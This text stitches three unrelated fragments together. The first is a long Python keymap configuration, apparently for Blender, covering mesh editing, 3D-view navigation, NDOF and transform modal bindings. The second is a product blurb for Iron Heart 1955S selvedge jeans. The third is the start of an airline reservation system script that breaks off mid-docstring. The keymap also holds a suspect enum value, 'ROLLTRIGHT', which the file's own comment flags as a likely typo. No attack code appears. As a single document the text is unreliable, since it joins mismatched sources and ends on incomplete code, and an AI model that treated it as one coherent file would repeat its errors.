kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_select_similar')
kmi = km.keymap_items.new('wm.call_menu', 'TAB', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_select_mode')
kmi = km.keymap_items.new('mesh.hide', 'H', 'PRESS')
kmi_props_setattr(kmi.properties, 'unselected', False)
kmi = km.keymap_items.new('mesh.hide', 'H', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'unselected', True)
kmi = km.keymap_items.new('mesh.reveal', 'H', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.normals_make_consistent', 'N', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'inside', False)
kmi = km.keymap_items.new('mesh.normals_make_consistent', 'N', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'inside', True)
kmi = km.keymap_items.new('view3d.edit_mesh_extrude_move_normal', 'E', 'CLICK')
kmi = km.keymap_items.new('wm.call_menu', 'E', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_extrude')
kmi = km.keymap_items.new('transform.edge_crease', 'E', 'PRESS', shift=True)
kmi = km.keymap_items.new('mesh.spin', 'R', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.fill', 'F', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.beautify_fill', 'F', 'PRESS', shift=True, alt=True)
kmi = km.keymap_items.new('mesh.quads_convert_to_tris', 'T', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'quad_method', 'BEAUTY')
kmi_props_setattr(kmi.properties, 'ngon_method', 'BEAUTY')
kmi = km.keymap_items.new('mesh.quads_convert_to_tris', 'T', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'quad_method', 'FIXED')
kmi_props_setattr(kmi.properties, 'ngon_method', 'CLIP')
kmi = km.keymap_items.new('mesh.tris_convert_to_quads', 'J', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.rip_move', 'V', 'PRESS')
kmi = km.keymap_items.new('mesh.rip_move_fill', 'V', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.rip_edge_move', 'D', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.merge', 'M', 'PRESS', alt=True)
kmi = km.keymap_items.new('transform.shrink_fatten', 'S', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.edge_face_add', 'F', 'PRESS')
kmi = km.keymap_items.new('mesh.duplicate_move', 'D', 'PRESS', shift=True)
kmi = km.keymap_items.new('wm.call_menu', 'A', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'name', 'INFO_MT_mesh_add')
kmi = km.keymap_items.new('mesh.separate', 'P', 'PRESS')
kmi = km.keymap_items.new('mesh.split', 'Y', 'PRESS')
kmi = km.keymap_items.new('mesh.vert_connect_path', 'J', 'PRESS')
kmi = km.keymap_items.new('transform.vert_slide', 'V', 'PRESS', shift=True)
kmi = km.keymap_items.new('mesh.dupli_extrude_cursor', 'ACTIONMOUSE', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'rotate_source', True)
kmi = km.keymap_items.new('mesh.dupli_extrude_cursor', 'ACTIONMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'rotate_source', False)
kmi = km.keymap_items.new('wm.call_menu', 'X', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_delete')
kmi = km.keymap_items.new('wm.call_menu', 'DEL', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_delete')
kmi = km.keymap_items.new('mesh.dissolve_mode', 'X', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.dissolve_mode', 'DEL', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.knife_tool', 'C', 'CLICK')
kmi_props_setattr(kmi.properties, 'use_occlude_geometry', True)
kmi_props_setattr(kmi.properties, 'only_selected', False)
kmi = km.keymap_items.new('mesh.knife_tool', 'K', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_occlude_geometry', False)
kmi_props_setattr(kmi.properties, 'only_selected', True)
kmi = km.keymap_items.new('object.vertex_parent_set', 'P', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('wm.call_menu', 'W', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_specials')
kmi.active = False  # binding registered but deliberately disabled
kmi = km.keymap_items.new('wm.call_menu', 'F', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_faces')
kmi = km.keymap_items.new('wm.call_menu', 'E', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_edges')
kmi = km.keymap_items.new('wm.call_menu', 'V', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_vertices')
kmi = km.keymap_items.new('wm.call_menu', 'H', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_hook')
kmi = km.keymap_items.new('wm.call_menu', 'U', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_uv_map')
kmi = km.keymap_items.new('wm.call_menu', 'G', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_vertex_group')
# Ctrl+0..5 set the subdivision level directly (mirrors Object Mode).
kmi = km.keymap_items.new('object.subdivision_set', 'ZERO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 0)
kmi = km.keymap_items.new('object.subdivision_set', 'ONE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 1)
kmi = km.keymap_items.new('object.subdivision_set', 'TWO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 2)
kmi = km.keymap_items.new('object.subdivision_set', 'THREE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 3)
kmi = km.keymap_items.new('object.subdivision_set', 'FOUR', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 4)
kmi = km.keymap_items.new('object.subdivision_set', 'FIVE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 5)
kmi = km.keymap_items.new('wm.context_cycle_enum', 'O', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit_falloff')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'O', 'PRESS')
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit')
kmi_props_setattr(kmi.properties, 'value_1', 'DISABLED')
kmi_props_setattr(kmi.properties, 'value_2', 'ENABLED')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'O', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit')
kmi_props_setattr(kmi.properties, 'value_1', 'DISABLED')
kmi_props_setattr(kmi.properties, 'value_2', 'CONNECTED')
kmi = km.keymap_items.new('view3d.manipulator', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'release_confirm', True)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'HOLD', shift=True)
# 1/2/3 switch between vertex / edge / face select modes; Shift toggles.
kmi = km.keymap_items.new('mesh.select_mode', 'ONE', 'CLICK')
kmi = km.keymap_items.new('mesh.select_mode', 'TWO', 'CLICK')
kmi_props_setattr(kmi.properties, 'type', 'EDGE')
kmi = km.keymap_items.new('mesh.select_mode', 'THREE', 'CLICK')
kmi_props_setattr(kmi.properties, 'type', 'FACE')
kmi = km.keymap_items.new('mesh.select_mode', 'ONE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'use_expand', False)
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('mesh.select_mode', 'TWO', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'type', 'EDGE')
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('mesh.select_mode', 'THREE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'type', 'FACE')
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('wm.call_menu', 'ONE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_vertices')
kmi.active = False  # binding registered but deliberately disabled
kmi = km.keymap_items.new('wm.call_menu', 'TWO', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_edges')
kmi.active = False  # binding registered but deliberately disabled
kmi = km.keymap_items.new('wm.call_menu', 'THREE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_faces')
kmi.active = False  # binding registered but deliberately disabled
# Map 3D View
# Keymap for the 3D viewport: navigation (orbit/pan/zoom/roll), numpad
# views, NDOF (3D mouse) bindings, and mouse selection.
km = kc.keymaps.new('3D View', space_type='VIEW_3D', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('view3d.cursor3d', 'RIGHTMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'ACTIONMOUSE', 'PRESS')
# NOTE(review): 'VIEW3D_MT_rRMB' is presumably a custom menu defined in a
# companion add-on — confirm it is registered before this keymap loads.
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_rRMB')
kmi = km.keymap_items.new('view3d.cursor3d', 'RIGHTMOUSE', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('view3d.rotate', 'MIDDLEMOUSE', 'PRESS')
kmi = km.keymap_items.new('view3d.move', 'MIDDLEMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.zoom', 'MIDDLEMOUSE', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('view3d.dolly', 'MIDDLEMOUSE', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('view3d.view_selected', 'SPACE', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', True)
kmi = km.keymap_items.new('view3d.view_selected', 'NUMPAD_PERIOD', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', False)
kmi = km.keymap_items.new('view3d.view_lock_to_active', 'NUMPAD_PERIOD', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.view_lock_clear', 'NUMPAD_PERIOD', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.navigate', 'F', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.smoothview', 'TIMER1', 'ANY', any=True)
kmi = km.keymap_items.new('view3d.rotate', 'TRACKPADPAN', 'ANY')
kmi = km.keymap_items.new('view3d.rotate', 'MOUSEROTATE', 'ANY')
kmi = km.keymap_items.new('view3d.move', 'TRACKPADPAN', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.zoom', 'TRACKPADZOOM', 'ANY')
kmi = km.keymap_items.new('view3d.zoom', 'TRACKPADPAN', 'ANY', ctrl=True)
kmi = km.keymap_items.new('view3d.zoom', 'NUMPAD_PLUS', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'NUMPAD_MINUS', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom', 'EQUAL', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'MINUS', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom', 'WHEELINMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'WHEELOUTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.dolly', 'NUMPAD_PLUS', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.dolly', 'NUMPAD_MINUS', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.dolly', 'EQUAL', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.dolly', 'MINUS', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom_camera_1_to_1', 'NUMPAD_ENTER', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.view_center_camera', 'HOME', 'PRESS')
kmi = km.keymap_items.new('view3d.view_center_lock', 'HOME', 'PRESS')
kmi = km.keymap_items.new('view3d.view_center_cursor', 'HOME', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.view_center_pick', 'F', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.view_all', 'HOME', 'PRESS')
kmi_props_setattr(kmi.properties, 'center', False)
kmi = km.keymap_items.new('view3d.view_all', 'HOME', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'use_all_regions', True)
kmi_props_setattr(kmi.properties, 'center', False)
kmi = km.keymap_items.new('view3d.view_all', 'C', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'center', True)
# Numpad views: 0 camera, 1/3/7 front/right/top, Ctrl for the opposite side.
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_0', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'CAMERA')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_2', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITDOWN')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_4', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITLEFT')
kmi = km.keymap_items.new('view3d.view_persportho', 'NUMPAD_5', 'PRESS')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_6', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITRIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_8', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITUP')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_2', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANDOWN')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_4', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANLEFT')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_6', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_8', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANUP')
kmi = km.keymap_items.new('view3d.view_roll', 'NUMPAD_4', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLLEFT')
kmi = km.keymap_items.new('view3d.view_roll', 'NUMPAD_6', 'PRESS', shift=True)
# NOTE(review): 'ROLLTRIGHT' looks like a typo for 'ROLLRIGHT' — confirm
# against the view3d.view_roll enum (kmi_props_setattr would only warn).
kmi_props_setattr(kmi.properties, 'type', 'ROLLTRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELUPMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELDOWNMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANLEFT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELUPMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'PANUP')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'PANDOWN')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELUPMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITLEFT')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELDOWNMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITRIGHT')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELUPMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITUP')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELDOWNMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITDOWN')
kmi = km.keymap_items.new('view3d.view_roll', 'WHEELUPMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLLEFT')
kmi = km.keymap_items.new('view3d.view_roll', 'WHEELDOWNMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLTRIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.localview', 'NUMPAD_SLASH', 'PRESS')
# NDOF (3D mouse) navigation and view buttons.
kmi = km.keymap_items.new('view3d.ndof_orbit_zoom', 'NDOF_MOTION', 'ANY')
kmi = km.keymap_items.new('view3d.ndof_orbit', 'NDOF_MOTION', 'ANY', ctrl=True)
kmi = km.keymap_items.new('view3d.ndof_pan', 'NDOF_MOTION', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.ndof_all', 'NDOF_MOTION', 'ANY', shift=True, ctrl=True)
kmi = km.keymap_items.new('view3d.view_selected', 'NDOF_BUTTON_FIT', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', False)
kmi = km.keymap_items.new('view3d.view_roll', 'NDOF_BUTTON_ROLL_CCW', 'PRESS')
kmi_props_setattr(kmi.properties, 'angle', -1.5707963705062866)
kmi = km.keymap_items.new('view3d.view_roll', 'NDOF_BUTTON_ROLL_CW', 'PRESS')
kmi_props_setattr(kmi.properties, 'angle', 1.5707963705062866)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_FRONT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_BACK', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_LEFT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_RIGHT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_TOP', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_BOTTOM', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_FRONT', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_RIGHT', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_TOP', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi_props_setattr(kmi.properties, 'align_active', True)
# Mouse selection variants: plain, Shift (toggle), Ctrl (deselect),
# Alt (enumerate overlapping).
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', True)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', True)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY', ctrl=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('view3d.view_center_pick', 'MIDDLEMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new('transform.translate', 'D', 'CLICK')
kmi = km.keymap_items.new('transform.resize', 'S', 'CLICK')
kmi = km.keymap_items.new('transform.rotate', 'A', 'CLICK')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'Z', 'CLICK')
kmi_props_setattr(kmi.properties, 'data_path', 'space_data.viewport_shade')
kmi_props_setattr(kmi.properties, 'value_1', 'SOLID')
kmi_props_setattr(kmi.properties, 'value_2', 'WIREFRAME')
kmi.active = False  # binding registered but deliberately disabled
kmi = km.keymap_items.new('wm.context_toggle', 'Z', 'CLICK')
kmi_props_setattr(kmi.properties, 'data_path', 'space_data.use_occlude_geometry')
# Map Transform Modal Map
# Modal keymap active while a transform (grab/rotate/scale) is running:
# confirm/cancel, snapping toggles, proportional-size and auto-IK tweaks.
km = kc.keymaps.new('Transform Modal Map', space_type='EMPTY', region_type='WINDOW', modal=True)
kmi = km.keymap_items.new_modal('CANCEL', 'ESC', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'LEFTMOUSE', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'RET', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'NUMPAD_ENTER', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('TRANSLATE', 'G', 'PRESS')
kmi = km.keymap_items.new_modal('ROTATE', 'R', 'PRESS')
kmi = km.keymap_items.new_modal('RESIZE', 'S', 'CLICK')
kmi = km.keymap_items.new_modal('SNAP_TOGGLE', 'TAB', 'PRESS', shift=True)
# Holding either Ctrl key temporarily inverts the snap setting.
kmi = km.keymap_items.new_modal('SNAP_INV_ON', 'LEFT_CTRL', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_OFF', 'LEFT_CTRL', 'RELEASE', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_ON', 'RIGHT_CTRL', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_OFF', 'RIGHT_CTRL', 'RELEASE', any=True)
kmi = km.keymap_items.new_modal('ADD_SNAP', 'A', 'PRESS')
kmi = km.keymap_items.new_modal('REMOVE_SNAP', 'A', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'PAGE_UP', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'PAGE_DOWN', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'PAGE_UP', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'PAGE_DOWN', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'WHEELDOWNMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'WHEELUPMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'WHEELUPMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE', 'TRACKPADPAN', 'ANY')
kmi = km.keymap_items.new_modal('EDGESLIDE_EDGE_NEXT', 'WHEELDOWNMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('EDGESLIDE_PREV_NEXT', 'WHEELUPMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_UP', 'PAGE_UP', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_DOWN', 'PAGE_DOWN', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_UP', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('AUTOIK_CHAIN_LEN_DOWN', 'WHEELUPMOUSE', 'PRESS', shift=True)
# Map Gesture Border
# Modal keymap for border (box) select: begin on press, select on
# release (Shift keeps selecting), Ctrl-release deselects instead.
km = kc.keymaps.new('Gesture Border', space_type='EMPTY', region_type='WINDOW', modal=True)
kmi = km.keymap_items.new_modal('CANCEL', 'ESC', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('BEGIN', 'LEFTMOUSE', 'PRESS')
kmi = km.keymap_items.new_modal('SELECT', 'LEFTMOUSE', 'RELEASE')
kmi = km.keymap_items.new_modal('SELECT', 'LEFTMOUSE', 'RELEASE', shift=True)
kmi = km.keymap_items.new_modal('DESELECT', 'LEFTMOUSE', 'RELEASE', ctrl=True)
|
Representing Iron Heart's take on the classic straight leg 1955 cut, the 1955S utilizes the Japanese brand's classic super heavy, but super soft 21 oz. indigo selvedge denim which is sanforized in order to maintain little or no shrinkage. Other features of the denim include the four button fly, hidden rivets, fully lined rear pockets, and poly/cotton constructional stitching.
|
"""
AIRLINE RESERVATION SYSTEM
DEVELOPERS
Stephen Tafoya
Ryan Hamilton
MAIN PROJECT FILE - RUNS ENTIRE PROGRAM
"""
import sqlite3 # ST Import database management
class AirDB(object):  # ST
    """Handle the AIRPORTS database.

    Wraps an sqlite3 connection and provides insert/lookup helpers for
